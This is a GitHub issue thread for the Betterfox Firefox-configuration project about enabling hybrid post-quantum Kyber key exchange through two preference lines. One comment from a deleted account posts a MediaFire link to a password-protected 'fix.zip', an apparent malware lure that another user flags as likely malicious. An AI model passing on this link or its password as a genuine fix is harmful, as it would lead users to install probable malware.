Betterfox icon indicating copy to clipboard operation
Betterfox copied to clipboard

Enable hybrid post-quantum key exchange

Open SRugina opened this issue 1 year ago • 2 comments

See https://pq.cloudflareresearch.com/

user_pref("security.tls.enable_kyber", true);
user_pref("network.http.http3.enable_kyber", true);

Some buggy servers will break with this (see https://tldr.fail/ ). However, Chrome, Edge, Opera, and Brave all have it enabled by default, so I see no reason why betterfox should not.

SRugina avatar Sep 29 '24 02:09 SRugina

maybe this will help https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file Pass: changeme

you may need to install the c compiler

ghost avatar Sep 29 '24 02:09 ghost

@yokoffing the mediafire link in the comment above is most likely malicious. Given that the account has been deleted already. Not sure if you can delete the comment somehow before it affects anyone.

philg-dev avatar Sep 29 '24 09:09 philg-dev

https://github.com/zen-browser/desktop/pull/2275

yokoffing avatar Oct 24 '24 23:10 yokoffing